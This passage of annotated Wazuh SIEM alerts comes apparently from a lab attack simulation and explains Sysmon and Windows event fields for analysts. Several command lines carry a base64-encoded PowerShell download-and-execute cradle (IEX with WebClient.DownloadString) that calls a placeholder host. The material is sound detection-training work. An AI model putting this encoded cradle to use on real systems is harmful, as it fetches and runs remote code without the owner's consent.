CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ParentProcessId: 14476
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:27.432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 133 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2846443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:28.9848322Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350806 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:28.934
ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ProcessId: 13544
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jugljtfi.vxn.ps1
CreationUtcTime: 2025-04-24 22:56:28.934
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:28.934 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jugljtfi.vxn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:28.934 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2849212 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:29.1998112Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 44009 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 Kind of logon that occurred; per the event text above, the most common types are 2 (interactive) and 3 (network). Type 5 here is a service logon started by services.exe as SYSTEM.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated for this logon (e.g., 128‑bit); per the event text above, 0 means no session key was requested, as with this local service logon.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535392.2856547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:29.3906500Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3076 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10380 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 130 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535393.2858360 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:31.2111559Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350830 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:30.128
ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ProcessId: 9136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ParentProcessId: 13544
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:30.128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 134 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535393.2866427 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:31.4169608Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350839 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
